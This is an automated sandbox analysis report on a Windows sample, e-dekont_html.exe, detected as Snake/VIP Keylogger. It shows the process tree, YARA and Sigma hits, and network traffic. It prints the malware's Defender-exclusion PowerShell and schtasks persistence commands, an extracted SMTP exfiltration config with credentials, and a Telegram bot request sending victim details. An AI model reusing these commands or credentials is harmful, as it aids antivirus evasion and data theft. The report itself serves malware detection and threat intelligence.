

Windows Analysis Report
e-dekont_html.exe

Overview

General Information

Sample name: e-dekont_html.exe
Analysis ID: 1559103
MD5: 3c1d34a25a8b8a96896e746f13c346bf
SHA1: 31c17eebffbcb57a3a833c99541748e508d82714
SHA256: 7bd9596f753e58ba917ba418c191af8fcb9b537e73ee6a86989960099585394f
Tags: exe, geo, MassLogger, TUR, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • e-dekont_html.exe (PID: 3756 cmdline: "C:\Users\user\Desktop\e-dekont_html.exe" MD5: 3C1D34A25A8B8A96896E746F13C346BF)
    • powershell.exe (PID: 6500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7508 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7044 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • e-dekont_html.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\e-dekont_html.exe" MD5: 3C1D34A25A8B8A96896E746F13C346BF)
  • fahKSvwo.exe (PID: 7432 cmdline: C:\Users\user\AppData\Roaming\fahKSvwo.exe MD5: 3C1D34A25A8B8A96896E746F13C346BF)
    • schtasks.exe (PID: 7600 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • fahKSvwo.exe (PID: 7696 cmdline: "C:\Users\user\AppData\Roaming\fahKSvwo.exe" MD5: 3C1D34A25A8B8A96896E746F13C346BF)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

VIP Keylogger configuration: {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Snake Keylogger configuration: {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Yara matches in memory dumps (Source | Rule | Description | Author | Strings):

Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_VIPKeylogger | Description: Yara detected VIP Keylogger | Author: Joe Security
Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
  • 0x1aa0:$a1: get_encryptedPassword
  • 0x2028:$a2: get_encryptedUsername
  • 0x1713:$a3: get_timePasswordChanged
  • 0x182a:$a4: get_passwordField
  • 0x1ab6:$a5: set_encryptedPassword
  • 0x47d2:$a6: get_passwords
  • 0x4b66:$a7: get_logins
  • 0x47be:$a8: GetOutlookPasswords
  • 0x4177:$a9: StartKeylogger
  • 0x4abf:$a10: KeyLoggerEventArgs
  • 0x4217:$a11: KeyLoggerEventArgsEventHandler
Source: 00000008.00000002.4161363308.0000000002E99000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000D.00000002.4158045385.000000000043D000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000D.00000002.4162043162.00000000032A1000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
(18 entries in total)
Yara matches in unpacked PE files (Source | Rule | Description | Author | Strings):

Source: 8.2.e-dekont_html.exe.400000.0.unpack | Rule: JoeSecurity_VIPKeylogger | Description: Yara detected VIP Keylogger | Author: Joe Security
Source: 8.2.e-dekont_html.exe.400000.0.unpack | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 8.2.e-dekont_html.exe.400000.0.unpack | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
  • 0x2dca0:$a1: get_encryptedPassword
  • 0x2e228:$a2: get_encryptedUsername
  • 0x2d913:$a3: get_timePasswordChanged
  • 0x2da2a:$a4: get_passwordField
  • 0x2dcb6:$a5: set_encryptedPassword
  • 0x309d2:$a6: get_passwords
  • 0x30d66:$a7: get_logins
  • 0x309be:$a8: GetOutlookPasswords
  • 0x30377:$a9: StartKeylogger
  • 0x30cbf:$a10: KeyLoggerEventArgs
  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
Source: 8.2.e-dekont_html.exe.400000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Description: Detects executables with potential process hooking | Author: ditekSHen
  • 0x2f064:$s1: UnHook
  • 0x2f06b:$s2: SetHook
  • 0x2f073:$s3: CallNextHook
  • 0x2f080:$s4: _hook
Source: 0.2.e-dekont_html.exe.3cdb750.3.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
(23 entries in total)

                System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 3756, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 6500, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\fahKSvwo.exe, ParentImage: C:\Users\user\AppData\Roaming\fahKSvwo.exe, ParentProcessId: 7432, ParentProcessName: fahKSvwo.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp", ProcessId: 7600, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 3756, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", ProcessId: 7044, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 3756, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe", ProcessId: 6500, ProcessName: powershell.exe

                Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\e-dekont_html.exe", ParentImage: C:\Users\user\Desktop\e-dekont_html.exe, ParentProcessId: 3756, ParentProcessName: e-dekont_html.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp", ProcessId: 7044, ProcessName: schtasks.exe
Suricata IDS alerts (low severity, HTTPS to 188.114.96.3 / 188.114.97.3):

Timestamp                        SID      Severity  Classtype        Source IP    Src Port  Destination IP  Dst Port  Protocol
2024-11-20T07:52:14.228878+0100  2803305  3         Unknown Traffic  192.168.2.4  49737     188.114.97.3    443       TCP
2024-11-20T07:52:15.513508+0100  2803305  3         Unknown Traffic  192.168.2.4  49739     188.114.97.3    443       TCP
2024-11-20T07:52:19.513508+0100  2803305  3         Unknown Traffic  192.168.2.4  49745     188.114.97.3    443       TCP
2024-11-20T07:52:20.075811+0100  2803305  3         Unknown Traffic  192.168.2.4  49746     188.114.97.3    443       TCP
2024-11-20T07:52:21.872740+0100  2803305  3         Unknown Traffic  192.168.2.4  49752     188.114.96.3    443       TCP
2024-11-20T07:52:23.778611+0100  2803305  3         Unknown Traffic  192.168.2.4  49759     188.114.96.3    443       TCP
2024-11-20T07:52:24.029099+0100  2803305  3         Unknown Traffic  192.168.2.4  49760     188.114.96.3    443       TCP
2024-11-20T07:52:26.148930+0100  2803305  3         Unknown Traffic  192.168.2.4  49765     188.114.96.3    443       TCP
2024-11-20T07:52:27.582198+0100  2803305  3         Unknown Traffic  192.168.2.4  61283     188.114.96.3    443       TCP

Suricata IDS alerts (plain HTTP to 193.122.130.0):

Timestamp                        SID      Severity  Classtype                Source IP    Src Port  Destination IP  Dst Port  Protocol
2024-11-20T07:52:12.696787+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49733     193.122.130.0   80        TCP
2024-11-20T07:52:13.697027+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49733     193.122.130.0   80        TCP
2024-11-20T07:52:15.024961+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49738     193.122.130.0   80        TCP
2024-11-20T07:52:18.243695+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49741     193.122.130.0   80        TCP
2024-11-20T07:52:19.462372+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49741     193.122.130.0   80        TCP
2024-11-20T07:52:20.634261+0100  2803274  2         Potentially Bad Traffic  192.168.2.4  49749     193.122.130.0   80        TCP



                AV Detection

Source: 00000008.00000002.4158022319.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe, ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe, Virustotal: Detection: 67%
Source: e-dekont_html.exe, ReversingLabs: Detection: 63%
Source: e-dekont_html.exe, Virustotal: Detection: 67%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe, Joe Sandbox ML: detected
Source: e-dekont_html.exe, Joe Sandbox ML: detected

                Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: e-dekont_html.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61282 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61290 version: TLS 1.2
Source: e-dekont_html.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: bbvK.pdbSHA256, source: e-dekont_html.exe, fahKSvwo.exe.0.dr
Source: Binary string: bbvK.pdb, source: e-dekont_html.exe, fahKSvwo.exe.0.dr
Source: C:\Users\user\Desktop\e-dekont_html.exe, Code function: 4x nop then jmp 076B51BCh, 0_2_076B4965
Source: C:\Users\user\Desktop\e-dekont_html.exe, Code function: 4x nop then jmp 02BEF8E9h, 8_2_02BEF631
Source: C:\Users\user\Desktop\e-dekont_html.exe, Code function: 4x nop then jmp 02BEFD41h, 8_2_02BEFA88
Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe, Code function: 4x nop then jmp 07254434h, 9_2_07253BDD
Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe, Code function: 4x nop then jmp 0159F8E9h, 13_2_0159F631
Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe, Code function: 4x nop then jmp 0159FD41h, 13_2_0159FA88

                Networking

Source: unknown, DNS query: name: api.telegram.org
Source: Yara match, File source: 0.2.e-dekont_html.exe.3d1e770.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, type: UNPACKEDPE
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:24:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20and%20Time:%2020/11/2024%20/%2017:43:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20528110%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 188.114.97.3
Source: Joe Sandbox View, IP Address: 188.114.97.3
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: checkip.dyndns.org
Source: unknown, DNS query: name: reallyfreegeoip.org
Source: unknown, DNS query: name: reallyfreegeoip.org
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.130.0:80
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 193.122.130.0:80
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.130.0:80
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 188.114.97.3:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61283 -> 188.114.96.3:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic, Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 188.114.96.3:443
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
